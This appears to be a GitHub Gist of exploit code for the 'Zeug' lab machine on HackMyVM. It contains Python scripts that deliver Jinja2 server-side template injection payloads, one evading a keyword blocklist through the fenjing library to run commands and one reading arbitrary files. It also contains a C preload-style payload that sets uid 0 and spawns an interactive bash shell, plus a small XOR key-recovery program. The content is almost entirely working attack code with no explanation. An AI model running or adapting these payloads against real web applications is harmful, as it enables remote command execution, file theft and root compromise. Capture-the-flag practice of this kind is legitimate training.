Last active
February 13, 2024 20:12
-
-
Save sharpicx/8d827f91ee5b3b5d68eb65c0f400bb9a to your computer and use it in GitHub Desktop.
HackMyVM - Zeug
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| int main() { | |
| srand(1); | |
| int var_18h = rand(); | |
| uint32_t var_14h = 0xdeadbeef; | |
| uint32_t total = var_14h ^ var_18h; | |
| printf("%d\n", total); | |
| return 0; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from fenjing import exec_cmd_payload | |
| import requests | |
| from bs4 import BeautifulSoup | |
| import sys | |
| def waf(s: str): | |
| blacklist = [ | |
| "os", | |
| "popen", | |
| "attr", | |
| "init", | |
| "import", | |
| "communicate", | |
| "runcmd", | |
| "[", | |
| "]", | |
| "subclasses", | |
| "request", | |
| "shell", | |
| "mro", | |
| "IMPORT", | |
| "OS", | |
| "POPEN", | |
| "|", | |
| ">", | |
| ] | |
| return all(word not in s for word in blacklist) | |
| if __name__ == "__main__": | |
| try: | |
| execute = str(sys.argv[1]) | |
| except IndexError: | |
| print("[-] No arguments provided!") | |
| exit() | |
| url = "http://192.168.1.78:5000/" | |
| shell_payload, _ = exec_cmd_payload(waf, execute) | |
| payload = { | |
| "file": ( | |
| "test.html", | |
| shell_payload, | |
| "text/html", | |
| ) | |
| } | |
| S = requests.Session() | |
| response = S.post(url, files=payload) | |
| soup = BeautifulSoup(response.text, "html.parser") | |
| div = soup.find("div") | |
| div_content = div.get_text(strip=True) if div else None | |
| print(div_content) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdlib.h> | |
| #include <unistd.h> | |
| _init() { | |
| setuid(0); | |
| setgid(0); | |
| system("/bin/bash -i"); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from bs4 import BeautifulSoup | |
| import requests | |
| import sys | |
| try: | |
| read_file = sys.argv[1] | |
| except IndexError: | |
| print("[-] No arguments provided!") | |
| exit() | |
| url = "http://192.168.1.78:5000/" | |
| S = requests.Session() | |
| headers = { | |
| "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary0Ja9fg9J8Hj2fafV" | |
| } | |
| payload = { | |
| "file": ( | |
| "test.html", | |
| "{{ get_flashed_messages.__globals__.__builtins__.open('%s').read() }}" | |
| % read_file, | |
| "text/html", | |
| ) | |
| } | |
| response = S.post(url, files=payload) | |
| soup = BeautifulSoup(response.text, "html.parser") | |
| div = soup.find("div") | |
| div_content = div.get_text(strip=True) if div else None | |
| if div_content is None: | |
| print("[-] No Such File Or Directory") | |
| else: | |
| print(div_content) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment